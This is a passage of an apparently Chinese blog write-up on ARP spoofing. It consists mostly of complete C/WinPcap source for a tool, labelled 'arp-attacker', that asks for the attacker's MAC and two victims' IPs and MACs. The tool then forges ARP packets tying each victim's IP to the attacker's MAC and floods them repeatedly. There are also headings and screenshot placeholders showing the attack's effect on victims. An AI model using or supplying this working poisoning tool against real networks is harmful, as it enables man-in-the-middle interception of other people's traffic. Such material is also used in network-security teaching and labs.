	<span class="n">packet</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x08</span><span class="p">;</span>	<span class="c1">//协议类型，值为0x0800表示使用的IP地址</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">17</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x00</span><span class="p">;</span>
   
	<span class="n">packet</span><span class="p">[</span><span class="mi">18</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x06</span><span class="p">;</span>	<span class="c1">//硬件地址长度为6字节</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">19</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x04</span><span class="p">;</span>	<span class="c1">//IP地址长度为4字节</span>
   
	<span class="n">packet</span><span class="p">[</span><span class="mi">20</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x00</span><span class="p">;</span>	<span class="c1">//表示了ARP操作类型</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">21</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x01</span><span class="p">;</span>	<span class="c1">//ARP请求为1，ARP响应为2，RARP请求为3，RARP响应为4</span>
   
	<span class="cm">/* 以太网源地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">22</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">23</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">24</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">25</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">26</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">27</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>
   
	<span class="cm">/* 源ip地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">28</span><span class="p">]</span> <span class="o">=</span> <span class="n">sip</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">29</span><span class="p">]</span> <span class="o">=</span> <span class="n">sip</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">30</span><span class="p">]</span> <span class="o">=</span> <span class="n">sip</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">31</span><span class="p">]</span> <span class="o">=</span> <span class="n">sip</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
   
	<span class="cm">/* 目的以太网地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">33</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">34</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">35</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">36</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">37</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>
   
	<span class="cm">/* 目的ip地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">38</span><span class="p">]</span> <span class="o">=</span> <span class="n">dip</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">39</span><span class="p">]</span> <span class="o">=</span> <span class="n">dip</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">40</span><span class="p">]</span> <span class="o">=</span> <span class="n">dip</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">41</span><span class="p">]</span> <span class="o">=</span> <span class="n">dip</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
   
	<span class="cm">/* Fill the rest of the packet with 0 */</span>
	<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">42</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">61</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="n">packet</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
	<span class="p">}</span>	
<span class="p">}</span>
</code></pre></div>    </div>
  </li>
</ol>

<h4 id="4-攻击效果">4. 攻击效果</h4>

<ol>
  <li>
    <p>受害者1</p>

    <p><img src="1569924260141.png" alt="1569924260141" /></p>
  </li>
  <li>
    <p>受害者2</p>

    <p><img src="1569924315454.png" alt="1569924315454" /></p>
  </li>
  <li>
    <p>攻击者抓包</p>

    <p>攻击过程：</p>

    <p><img src="1569927815119.png" alt="1569927815119" /></p>
  </li>
</ol>

<h4 id="5完整代码">5.完整代码</h4>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">//2019.10.1</span>
<span class="c1">//by zhyjc6</span>
<span class="cp">#include &lt;stdlib.h&gt;
#include &lt;stdio.h&gt;
#include &lt;pcap.h&gt;
</span>

<span class="kt">void</span> <span class="nf">pktbuild</span><span class="p">(</span><span class="n">u_char</span><span class="o">*</span> <span class="n">packet</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">smac</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">sip</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">dmac</span><span class="p">,</span> <span class="kt">int</span><span class="o">*</span> <span class="n">dip</span><span class="p">);</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">pcap_if_t</span><span class="o">*</span> <span class="n">alldevs</span><span class="p">;</span>			<span class="c1">//网卡列表</span>
	<span class="n">pcap_if_t</span><span class="o">*</span> <span class="n">d</span><span class="p">;</span>				<span class="c1">//选中的网卡</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>					<span class="c1">//全局计数变量</span>
	<span class="kt">int</span> <span class="n">inum</span><span class="p">;</span>					<span class="c1">//定位选中的网卡</span>
	<span class="n">u_char</span><span class="o">*</span> <span class="n">packet1</span><span class="p">[</span><span class="mi">100</span><span class="p">];</span>		<span class="c1">//arp帧包1</span>
	<span class="n">u_char</span><span class="o">*</span> <span class="n">packet2</span><span class="p">[</span><span class="mi">100</span><span class="p">];</span>		<span class="c1">//arp帧包2</span>

	<span class="n">pcap_t</span> <span class="o">*</span><span class="n">fp</span><span class="p">;</span>					<span class="c1">//启用网卡后的句柄</span>
	<span class="kt">char</span> <span class="n">errbuf</span><span class="p">[</span><span class="n">PCAP_ERRBUF_SIZE</span><span class="p">];</span>		<span class="c1">//错误缓冲区</span>
	<span class="kt">int</span> <span class="n">flood</span><span class="p">;</span>							<span class="c1">//发送包的数量</span>

	<span class="kt">int</span> <span class="n">self_mac</span><span class="p">[</span><span class="mi">6</span><span class="p">];</span>		<span class="c1">//攻击者自己的mac地址</span>
	<span class="kt">int</span> <span class="n">victim1_ip</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>		<span class="c1">//受害者1的ip</span>
	<span class="kt">int</span> <span class="n">victim1_mac</span><span class="p">[</span><span class="mi">6</span><span class="p">];</span>		<span class="c1">//受害者1的mac地址</span>
	<span class="kt">int</span> <span class="n">victim2_ip</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>		<span class="c1">//受害者2的ip</span>
	<span class="kt">int</span> <span class="n">victim2_mac</span><span class="p">[</span><span class="mi">6</span><span class="p">];</span>		<span class="c1">//受害者2的mac地址</span>

	<span class="n">printf</span><span class="p">(</span><span class="s">"the arp-attacker starts...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="cm">/* 检索设备列表 */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">pcap_findalldevs</span><span class="p">(</span><span class="o">&amp;</span><span class="n">alldevs</span><span class="p">,</span> <span class="n">errbuf</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error in pcap_findalldevs: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">errbuf</span><span class="p">);</span>
		<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"请在以下网卡中选择一个使用:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	
	<span class="cm">/* 打印网卡列表 */</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">d</span> <span class="o">=</span> <span class="n">alldevs</span><span class="p">;</span> <span class="n">d</span><span class="p">;</span> <span class="n">d</span> <span class="o">=</span> <span class="n">d</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"%d. %s"</span><span class="p">,</span> <span class="o">++</span><span class="n">i</span><span class="p">,</span> <span class="n">d</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">d</span><span class="o">-&gt;</span><span class="n">description</span><span class="p">)</span>
			<span class="n">printf</span><span class="p">(</span><span class="s">" (%s)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">d</span><span class="o">-&gt;</span><span class="n">description</span><span class="p">);</span>
		<span class="k">else</span>
			<span class="n">printf</span><span class="p">(</span><span class="s">" (No description available)</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
	<span class="p">{</span>  <span class="c1">//没有扫描到网卡</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">No interfaces found! Make sure WinPcap is installed.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
		<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">printf</span><span class="p">(</span><span class="s">"Enter the interface number (1-%d) to use: "</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%d"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">inum</span><span class="p">);</span>

	<span class="cm">/* 检查用户输入是否有效 */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">inum</span> <span class="o">&lt;</span> <span class="mi">1</span> <span class="o">||</span> <span class="n">inum</span> <span class="o">&gt;</span> <span class="n">i</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Adapter number out of range.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

		<span class="cm">/* 释放所有网卡 */</span>
		<span class="n">pcap_freealldevs</span><span class="p">(</span><span class="n">alldevs</span><span class="p">);</span>
		<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="cm">/* 跳到用户选中的网卡 */</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">d</span> <span class="o">=</span> <span class="n">alldevs</span><span class="p">,</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">inum</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span> <span class="n">d</span> <span class="o">=</span> <span class="n">d</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">,</span> <span class="n">i</span><span class="o">++</span><span class="p">);</span>

	<span class="cm">/* 打开用户选中的网卡适配器 */</span>
	<span class="k">if</span> <span class="p">((</span><span class="n">fp</span> <span class="o">=</span> <span class="n">pcap_open_live</span><span class="p">(</span><span class="n">d</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">,</span>		<span class="c1">// name of the device</span>
							 <span class="mi">65536</span><span class="p">,</span>			<span class="c1">// portion of the packet to capture. It doesn't matter in this case </span>
							 <span class="mi">1</span><span class="p">,</span>				<span class="c1">// promiscuous mode (nonzero means promiscuous)</span>
							 <span class="mi">1000</span><span class="p">,</span>			<span class="c1">// read timeout</span>
							 <span class="n">errbuf</span>			<span class="c1">// error buffer</span>
							 <span class="p">))</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="s">"</span><span class="se">\n</span><span class="s">Unable to open the adapter. %s is not supported by WinPcap</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
		<span class="k">return</span> <span class="mi">2</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">printf</span><span class="p">(</span><span class="s">"please input self_mac address like aa-aa-aa-aa-aa-aa: "</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%x-%x-%x-%x-%x-%x"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">self_mac</span><span class="p">[</span><span class="mi">5</span><span class="p">]);</span>

	<span class="n">printf</span><span class="p">(</span><span class="s">"please input victim1's ip like 1.1.1.1: "</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%d.%d.%d.%d"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">victim1_ip</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_ip</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_ip</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_ip</span><span class="p">[</span><span class="mi">3</span><span class="p">]);</span>

	<span class="n">printf</span><span class="p">(</span><span class="s">"please input victim1's mac like aa-aa-aa-aa-aa-aa: "</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%x-%x-%x-%x-%x-%x"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim1_mac</span><span class="p">[</span><span class="mi">5</span><span class="p">]);</span>

	<span class="n">printf</span><span class="p">(</span><span class="s">"please input victim2's ip like 1.1.1.1: "</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%d.%d.%d.%d"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">victim2_ip</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_ip</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_ip</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_ip</span><span class="p">[</span><span class="mi">3</span><span class="p">]);</span>

	<span class="n">printf</span><span class="p">(</span><span class="s">"please input victim2's mac like aa-aa-aa-aa-aa-aa: "</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%x-%x-%x-%x-%x-%x"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">victim2_mac</span><span class="p">[</span><span class="mi">5</span><span class="p">]);</span>

	<span class="n">pktbuild</span><span class="p">(</span><span class="o">&amp;</span><span class="n">packet1</span><span class="p">,</span> <span class="n">self_mac</span><span class="p">,</span> <span class="n">victim1_ip</span><span class="p">,</span> <span class="n">victim2_mac</span><span class="p">,</span> <span class="n">victim2_ip</span><span class="p">);</span>				<span class="c1">//build a arp-packet at &amp;packet</span>
	<span class="n">pktbuild</span><span class="p">(</span><span class="o">&amp;</span><span class="n">packet2</span><span class="p">,</span> <span class="n">self_mac</span><span class="p">,</span> <span class="n">victim2_ip</span><span class="p">,</span> <span class="n">victim1_mac</span><span class="p">,</span> <span class="n">victim1_ip</span><span class="p">);</span>				<span class="c1">//build a arp-packet at &amp;packet</span>

	<span class="n">printf</span><span class="p">(</span><span class="s">"please input the flood(num of packet to send):"</span><span class="p">);</span>
	<span class="n">scanf_s</span><span class="p">(</span><span class="s">"%d"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">flood</span><span class="p">);</span>

	<span class="cm">/* Send down the packet */</span>
	<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">flood</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">pcap_sendpacket</span><span class="p">(</span><span class="n">fp</span><span class="p">,</span>	<span class="c1">// Adapter</span>
			<span class="n">packet1</span><span class="p">,</span>				<span class="c1">// buffer with the packet</span>
			<span class="mi">100</span>				<span class="c1">// size</span>
			<span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
		<span class="p">{</span>
			<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">Error sending the packet: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pcap_geterr</span><span class="p">(</span><span class="n">fp</span><span class="p">));</span>
			<span class="k">return</span> <span class="mi">3</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">pcap_sendpacket</span><span class="p">(</span><span class="n">fp</span><span class="p">,</span>	<span class="c1">// Adapter</span>
			<span class="n">packet2</span><span class="p">,</span>				<span class="c1">// buffer with the packet</span>
			<span class="mi">100</span>				<span class="c1">// size</span>
		<span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
		<span class="p">{</span>
			<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">Error sending the packet: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pcap_geterr</span><span class="p">(</span><span class="n">fp</span><span class="p">));</span>
			<span class="k">return</span> <span class="mi">3</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="n">Sleep</span><span class="p">(</span><span class="mi">100</span><span class="p">);</span>			<span class="c1">//发送间隔时间100ms</span>
	<span class="p">}</span>
	<span class="n">pcap_close</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="cm">/* build arp-packet */</span>
<span class="kt">void</span> <span class="nf">pktbuild</span><span class="p">(</span><span class="n">u_char</span> <span class="o">*</span><span class="n">packet</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">smac</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">sip</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">dmac</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">dip</span><span class="p">)</span>
<span class="p">{</span>
	<span class="cm">/* 目的以太网地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>

	<span class="cm">/* 源以太网地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span>  <span class="n">smac</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">7</span><span class="p">]</span> <span class="o">=</span>  <span class="n">smac</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">=</span>  <span class="n">smac</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span>  <span class="n">smac</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">11</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>

	<span class="cm">/* set arp */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">12</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x08</span><span class="p">;</span>	<span class="c1">//0x0806表示该帧封装ARP包</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">13</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x06</span><span class="p">;</span>

	<span class="n">packet</span><span class="p">[</span><span class="mi">14</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x00</span><span class="p">;</span>	<span class="c1">//硬件类型，值为1表示以太网</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">15</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x01</span><span class="p">;</span>

	<span class="n">packet</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x08</span><span class="p">;</span>	<span class="c1">//协议类型，值为0x0800表示使用的IP地址</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">17</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x00</span><span class="p">;</span>

	<span class="n">packet</span><span class="p">[</span><span class="mi">18</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x06</span><span class="p">;</span>	<span class="c1">//硬件地址长度为6字节</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">19</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x04</span><span class="p">;</span>	<span class="c1">//IP地址长度为4字节</span>

	<span class="n">packet</span><span class="p">[</span><span class="mi">20</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x00</span><span class="p">;</span>	<span class="c1">//表示了ARP操作类型</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">21</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x01</span><span class="p">;</span>	<span class="c1">//ARP请求为1，ARP响应为2，RARP请求为3，RARP响应为4</span>

	<span class="cm">/* 以太网源地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">22</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">23</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">24</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">25</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">26</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">27</span><span class="p">]</span> <span class="o">=</span> <span class="n">smac</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>

	<span class="cm">/* 源ip地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">28</span><span class="p">]</span> <span class="o">=</span> <span class="n">sip</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">29</span><span class="p">]</span> <span class="o">=</span> <span class="n">sip</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">30</span><span class="p">]</span> <span class="o">=</span> <span class="n">sip</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">31</span><span class="p">]</span> <span class="o">=</span> <span class="n">sip</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>

	<span class="cm">/* 目的以太网地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">33</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">34</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">35</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">36</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">37</span><span class="p">]</span> <span class="o">=</span> <span class="n">dmac</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>

	<span class="cm">/* 目的ip地址 */</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">38</span><span class="p">]</span> <span class="o">=</span> <span class="n">dip</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">39</span><span class="p">]</span> <span class="o">=</span> <span class="n">dip</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
